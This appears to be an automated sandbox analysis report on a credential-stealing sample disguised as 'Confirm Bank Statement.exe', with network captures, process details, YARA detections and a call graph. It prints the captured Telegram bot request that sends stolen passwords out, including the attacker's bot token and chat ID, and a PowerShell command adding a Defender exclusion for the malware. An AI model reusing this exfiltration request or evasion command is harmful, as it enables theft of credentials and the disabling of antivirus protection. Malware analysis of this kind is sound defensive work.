                                                                                            Jan 14, 2025 16:43:25.522952080 CET8049701132.226.8.169192.168.2.7
                                                                                            Jan 14, 2025 16:43:28.121232986 CET8049701132.226.8.169192.168.2.7
                                                                                            Jan 14, 2025 16:43:28.130820036 CET49705443192.168.2.7104.21.64.1
                                                                                            Jan 14, 2025 16:43:28.130888939 CET44349705104.21.64.1192.168.2.7
                                                                                            Jan 14, 2025 16:43:28.130974054 CET49705443192.168.2.7104.21.64.1
                                                                                            Jan 14, 2025 16:43:28.139544964 CET49705443192.168.2.7104.21.64.1
                                                                                            Jan 14, 2025 16:43:28.139565945 CET44349705104.21.64.1192.168.2.7
                                                                                            Jan 14, 2025 16:43:28.173614025 CET4970180192.168.2.7132.226.8.169
                                                                                            Jan 14, 2025 16:43:28.615673065 CET44349705104.21.64.1192.168.2.7
                                                                                            Jan 14, 2025 16:43:28.615828037 CET49705443192.168.2.7104.21.64.1
                                                                                            Jan 14, 2025 16:43:28.620385885 CET49705443192.168.2.7104.21.64.1
                                                                                            Jan 14, 2025 16:43:28.620417118 CET44349705104.21.64.1192.168.2.7
                                                                                            Jan 14, 2025 16:43:28.620912075 CET44349705104.21.64.1192.168.2.7
                                                                                            Jan 14, 2025 16:43:28.666472912 CET49705443192.168.2.7104.21.64.1
                                                                                            Jan 14, 2025 16:43:28.683794975 CET49705443192.168.2.7104.21.64.1
                                                                                            Jan 14, 2025 16:43:28.731331110 CET44349705104.21.64.1192.168.2.7
                                                                                            Jan 14, 2025 16:43:28.801362038 CET44349705104.21.64.1192.168.2.7
                                                                                            Jan 14, 2025 16:43:28.801522970 CET44349705104.21.64.1192.168.2.7
                                                                                            Jan 14, 2025 16:43:28.801608086 CET49705443192.168.2.7104.21.64.1
                                                                                            Jan 14, 2025 16:43:28.807105064 CET49705443192.168.2.7104.21.64.1
                                                                                            Jan 14, 2025 16:43:33.967077971 CET4970180192.168.2.7132.226.8.169
                                                                                            Jan 14, 2025 16:43:33.972501993 CET8049701132.226.8.169192.168.2.7
                                                                                            Jan 14, 2025 16:43:34.401592970 CET8049701132.226.8.169192.168.2.7
                                                                                            Jan 14, 2025 16:43:34.417035103 CET49729443192.168.2.7149.154.167.220
                                                                                            Jan 14, 2025 16:43:34.417063951 CET44349729149.154.167.220192.168.2.7
                                                                                            Jan 14, 2025 16:43:34.417115927 CET49729443192.168.2.7149.154.167.220
                                                                                            Jan 14, 2025 16:43:34.417488098 CET49729443192.168.2.7149.154.167.220
                                                                                            Jan 14, 2025 16:43:34.417499065 CET44349729149.154.167.220192.168.2.7
                                                                                            Jan 14, 2025 16:43:34.454787016 CET4970180192.168.2.7132.226.8.169
                                                                                            Jan 14, 2025 16:43:35.065891027 CET44349729149.154.167.220192.168.2.7
                                                                                            Jan 14, 2025 16:43:35.066076040 CET49729443192.168.2.7149.154.167.220
                                                                                            Jan 14, 2025 16:43:35.067895889 CET49729443192.168.2.7149.154.167.220
                                                                                            Jan 14, 2025 16:43:35.067929029 CET44349729149.154.167.220192.168.2.7
                                                                                            Jan 14, 2025 16:43:35.068193913 CET44349729149.154.167.220192.168.2.7
                                                                                            Jan 14, 2025 16:43:35.069822073 CET49729443192.168.2.7149.154.167.220
                                                                                            Jan 14, 2025 16:43:35.111329079 CET44349729149.154.167.220192.168.2.7
                                                                                            Jan 14, 2025 16:43:35.111418009 CET49729443192.168.2.7149.154.167.220
                                                                                            Jan 14, 2025 16:43:35.111433029 CET44349729149.154.167.220192.168.2.7
                                                                                            Jan 14, 2025 16:43:35.509702921 CET44349729149.154.167.220192.168.2.7
                                                                                            Jan 14, 2025 16:43:35.509789944 CET44349729149.154.167.220192.168.2.7
                                                                                            Jan 14, 2025 16:43:35.509943962 CET49729443192.168.2.7149.154.167.220
                                                                                            Jan 14, 2025 16:43:35.510514975 CET49729443192.168.2.7149.154.167.220
                                                                                            Jan 14, 2025 16:44:39.409035921 CET8049701132.226.8.169192.168.2.7
                                                                                            Jan 14, 2025 16:44:39.409288883 CET4970180192.168.2.7132.226.8.169
                                                                                            Jan 14, 2025 16:45:08.821813107 CET4970180192.168.2.7132.226.8.169
                                                                                            Jan 14, 2025 16:45:08.826622963 CET8049701132.226.8.169192.168.2.7

                                                                                            UDP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Jan 14, 2025 16:43:23.060368061 CET5130253192.168.2.71.1.1.1
                                                                                            Jan 14, 2025 16:43:23.067289114 CET53513021.1.1.1192.168.2.7
                                                                                            Jan 14, 2025 16:43:28.122761965 CET5488253192.168.2.71.1.1.1
                                                                                            Jan 14, 2025 16:43:28.130083084 CET53548821.1.1.1192.168.2.7
                                                                                            Jan 14, 2025 16:43:34.405653000 CET6132853192.168.2.71.1.1.1
                                                                                            Jan 14, 2025 16:43:34.413548946 CET53613281.1.1.1192.168.2.7

                                                                                            DNS Queries

                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Jan 14, 2025 16:43:23.060368061 CET192.168.2.71.1.1.10xfa84Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                            Jan 14, 2025 16:43:28.122761965 CET192.168.2.71.1.1.10xa002Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                            Jan 14, 2025 16:43:34.405653000 CET192.168.2.71.1.1.10x5da9Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                            DNS Answers

                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Jan 14, 2025 16:43:23.067289114 CET1.1.1.1192.168.2.70xfa84No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                            Jan 14, 2025 16:43:23.067289114 CET1.1.1.1192.168.2.70xfa84No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                            Jan 14, 2025 16:43:23.067289114 CET1.1.1.1192.168.2.70xfa84No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                            Jan 14, 2025 16:43:23.067289114 CET1.1.1.1192.168.2.70xfa84No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                            Jan 14, 2025 16:43:23.067289114 CET1.1.1.1192.168.2.70xfa84No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                            Jan 14, 2025 16:43:23.067289114 CET1.1.1.1192.168.2.70xfa84No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                            Jan 14, 2025 16:43:28.130083084 CET1.1.1.1192.168.2.70xa002No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                            Jan 14, 2025 16:43:28.130083084 CET1.1.1.1192.168.2.70xa002No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                            Jan 14, 2025 16:43:28.130083084 CET1.1.1.1192.168.2.70xa002No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                            Jan 14, 2025 16:43:28.130083084 CET1.1.1.1192.168.2.70xa002No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                            Jan 14, 2025 16:43:28.130083084 CET1.1.1.1192.168.2.70xa002No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                            Jan 14, 2025 16:43:28.130083084 CET1.1.1.1192.168.2.70xa002No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                            Jan 14, 2025 16:43:28.130083084 CET1.1.1.1192.168.2.70xa002No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                            Jan 14, 2025 16:43:34.413548946 CET1.1.1.1192.168.2.70x5da9No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                            HTTP Request Dependency Graph

                                                                                            • reallyfreegeoip.org
                                                                                            • api.telegram.org
                                                                                            • checkip.dyndns.org

                                                                                            HTTP Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.749701132.226.8.169804244C:\Users\user\Desktop\Confirm Bank Statement.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 14, 2025 16:43:23.088149071 CET151OUTGET / HTTP/1.1
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                            Host: checkip.dyndns.org
                                                                                            Connection: Keep-Alive
                                                                                            Jan 14, 2025 16:43:25.513681889 CET273INHTTP/1.1 200 OK
                                                                                            Date: Tue, 14 Jan 2025 15:43:25 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Cache-Control: no-cache
                                                                                            Pragma: no-cache
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                            Jan 14, 2025 16:43:25.514343023 CET273INHTTP/1.1 200 OK
                                                                                            Date: Tue, 14 Jan 2025 15:43:25 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Cache-Control: no-cache
                                                                                            Pragma: no-cache
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                            Jan 14, 2025 16:43:25.518198013 CET127OUTGET / HTTP/1.1
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                            Host: checkip.dyndns.org
                                                                                            Jan 14, 2025 16:43:28.121232986 CET273INHTTP/1.1 200 OK
                                                                                            Date: Tue, 14 Jan 2025 15:43:27 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Cache-Control: no-cache
                                                                                            Pragma: no-cache
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                            Jan 14, 2025 16:43:33.967077971 CET127OUTGET / HTTP/1.1
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                            Host: checkip.dyndns.org
                                                                                            Jan 14, 2025 16:43:34.401592970 CET273INHTTP/1.1 200 OK
                                                                                            Date: Tue, 14 Jan 2025 15:43:34 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Cache-Control: no-cache
                                                                                            Pragma: no-cache
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                            HTTPS Proxied Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.749705104.21.64.14434244C:\Users\user\Desktop\Confirm Bank Statement.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-14 15:43:28 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                            Host: reallyfreegeoip.org
                                                                                            Connection: Keep-Alive
                                                                                            2025-01-14 15:43:28 UTC861INHTTP/1.1 200 OK
                                                                                            Date: Tue, 14 Jan 2025 15:43:28 GMT
                                                                                            Content-Type: text/xml
                                                                                            Content-Length: 362
                                                                                            Connection: close
                                                                                            Age: 2184197
                                                                                            Cache-Control: max-age=31536000
                                                                                            cf-cache-status: HIT
                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0%2F0yo%2F1oQtV2PxsFJ0bUz81sIUZNsffmDq%2F7VdNXYOCHaoResVaYwilbP0fRc5Lh3egSvFcCqJG8uMYb5C1uHEy%2B9QhShcaaASxp%2FJ6eYVk%2FbYHQzaDoN2Ho387QNtDvHm9OclKk"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 901ebdec9f1fc358-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1586&min_rtt=1537&rtt_var=611&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1899804&cwnd=155&unsent_bytes=0&cid=50d6075d2213d69f&ts=203&x=0"
                                                                                            2025-01-14 15:43:28 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.749729149.154.167.2204434244C:\Users\user\Desktop\Confirm Bank Statement.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-14 15:43:35 UTC299OUTPOST /bot8161619263:AAGh7P51iOu7fKM21V3X_t2ljzNjQ9YsI9E/sendDocument?chat_id=1780630805&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                            Content-Type: multipart/form-data; boundary================8dd34884aef51fe
                                                                                            Host: api.telegram.org
                                                                                            Content-Length: 1088
                                                                                            Connection: Keep-Alive
                                                                                            2025-01-14 15:43:35 UTC1088OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 38 38 34 61 65 66 35 31 66 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                            Data Ascii: --===============8dd34884aef51feContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                            2025-01-14 15:43:35 UTC388INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0
                                                                                            Date: Tue, 14 Jan 2025 15:43:35 GMT
                                                                                            Content-Type: application/json
                                                                                            Content-Length: 545
                                                                                            Connection: close
                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                            Access-Control-Allow-Origin: *
                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                            2025-01-14 15:43:35 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 35 32 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 31 36 31 36 31 39 32 36 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 4f 56 41 32 30 32 35 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 61 6e 74 69 6f 6b 61 6f 72 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 37 38 30 36 33 30 38 30 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 6c 6c 69 6e 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 69 6f 5f 73 61 6e 74 6f 73 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 38 36 39 34 31 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61
                                                                                            Data Ascii: {"ok":true,"result":{"message_id":521,"from":{"id":8161619263,"is_bot":true,"first_name":"NOVA2025","username":"santiokaorbot"},"chat":{"id":1780630805,"first_name":"Collins","username":"cio_santos","type":"private"},"date":1736869415,"document":{"file_na


                                                                                            Statistics

                                                                                            CPU Usage

                                                                                            Click to jump to process

                                                                                            Memory Usage

                                                                                            Click to jump to process

                                                                                            High Level Behavior Distribution

                                                                                            Click to dive into process behavior distribution

                                                                                            Behavior

                                                                                            Click to jump to process

                                                                                            System Behavior

                                                                                            General

                                                                                            Target ID:0
                                                                                            Start time:10:43:20
                                                                                            Start date:14/01/2025
                                                                                            Path:C:\Users\user\Desktop\Confirm Bank Statement.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\Confirm Bank Statement.exe"
                                                                                            Imagebase:0xc90000
                                                                                            File size:578'560 bytes
                                                                                            MD5 hash:D16A155D98D41CF4109FC2EBE34C0AB4
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.1270907514.0000000004019000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1270907514.0000000004019000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1270907514.0000000004019000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1270907514.0000000004019000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1274255090.0000000007240000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.1270907514.0000000004057000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1270907514.0000000004057000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1270907514.0000000004057000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1270907514.0000000004057000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1267719440.000000000313C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:3
                                                                                            Start time:10:43:21
                                                                                            Start date:14/01/2025
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Confirm Bank Statement.exe"
                                                                                            Imagebase:0x4d0000
                                                                                            File size:433'152 bytes
                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:4
                                                                                            Start time:10:43:21
                                                                                            Start date:14/01/2025
                                                                                            Path:C:\Users\user\Desktop\Confirm Bank Statement.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\Confirm Bank Statement.exe"
                                                                                            Imagebase:0x430000
                                                                                            File size:578'560 bytes
                                                                                            MD5 hash:D16A155D98D41CF4109FC2EBE34C0AB4
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000004.00000002.3717562282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3717562282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.3717562282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.3717562282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000004.00000002.3720612902.0000000002AB3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3720612902.0000000002AB3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.3720612902.0000000002AB3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:low
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:6
                                                                                            Start time:10:43:21
                                                                                            Start date:14/01/2025
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff75da10000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Disassembly

                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:10.5%
                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                              Signature Coverage:3.2%
                                                                                              Total number of Nodes:94
                                                                                              Total number of Limit Nodes:5
                                                                                              execution_graph 50039 7289e68 50040 7289e98 50039->50040 50041 7289f1e 50040->50041 50042 7289f33 50040->50042 50047 72875e8 50041->50047 50044 72875e8 3 API calls 50042->50044 50045 7289f42 50044->50045 50049 72875f3 50047->50049 50048 7289f29 50049->50048 50052 728a878 50049->50052 50059 728a888 50049->50059 50053 728a886 50052->50053 50065 7287624 50053->50065 50056 728a8af 50056->50048 50057 728a8c7 CreateIconFromResourceEx 50058 728a956 50057->50058 50058->50048 50060 7287624 CreateIconFromResourceEx 50059->50060 50061 728a8a2 50060->50061 50062 728a8c7 CreateIconFromResourceEx 50061->50062 50063 728a8af 50061->50063 50064 728a956 50062->50064 50063->50048 50064->50048 50066 728a8d8 CreateIconFromResourceEx 50065->50066 50067 728a8a2 50066->50067 50067->50056 50067->50057 49943 143d560 49944 143d5a6 49943->49944 49948 143d740 49944->49948 49951 143d72f 49944->49951 49945 143d693 49954 143b1b4 49948->49954 49952 143d76e 49951->49952 49953 143b1b4 DuplicateHandle 49951->49953 49952->49945 49953->49952 49955 143d7a8 DuplicateHandle 49954->49955 49956 143d76e 49955->49956 49956->49945 49957 1434668 49958 1434672 49957->49958 49962 1434758 49957->49962 49967 1433e30 49958->49967 49960 143468d 49963 143477d 49962->49963 49971 1434859 49963->49971 49975 1434868 49963->49975 49968 1433e3b 49967->49968 49983 1435ae4 49968->49983 49970 1437037 49970->49960 49972 1434868 49971->49972 49973 143496c 49972->49973 49979 1434538 49972->49979 49977 143488f 49975->49977 49976 143496c 49976->49976 49977->49976 49978 1434538 CreateActCtxA 49977->49978 49978->49976 49980 1435cf8 CreateActCtxA 49979->49980 49982 1435dbb 49980->49982 49984 1435aef 49983->49984 49987 1435b04 49984->49987 49986 14373ad 49986->49970 49988 1435b0f 49987->49988 49991 1435b34 49988->49991 49990 1437482 49990->49986 49992 1435b3f 49991->49992 49995 1435b64 49992->49995 49994 1437585 49994->49990 49996 1435b6f 49995->49996 49998 1438aeb 49996->49998 50002 143ad90 49996->50002 49997 1438b29 49997->49994 49998->49997 50005 143ce81 49998->50005 50010 143ce90 49998->50010 50015 143b1d0 50002->50015 50006 143ce90 50005->50006 50007 143ced5 50006->50007 50023 143d448 50006->50023 50027 143d438 50006->50027 50007->49997 50011 143ceb1 50010->50011 50012 143ced5 50011->50012 50013 143d448 GetModuleHandleW 50011->50013 50014 143d438 GetModuleHandleW 50011->50014 50012->49997 50013->50012 50014->50012 50018 143b2b9 50015->50018 50016 143ada6 50016->49998 50019 143b2fc 50018->50019 50020 143b2d9 50018->50020 50019->50016 50020->50019 50021 143b500 GetModuleHandleW 50020->50021 50022 143b52d 50021->50022 50022->50016 50025 143d455 50023->50025 50024 143d48f 50024->50007 50025->50024 50031 143d280 50025->50031 50029 143d43d 50027->50029 50028 143d48f 50028->50007 50029->50028 50030 143d280 GetModuleHandleW 50029->50030 50030->50028 50032 143d28b 50031->50032 50034 143dda0 50032->50034 50035 143d39c 50032->50035 50034->50034 50036 143d3a7 50035->50036 50037 1435b64 GetModuleHandleW 50036->50037 50038 143de0f 50037->50038 50038->50034

                                                                                              Executed Functions

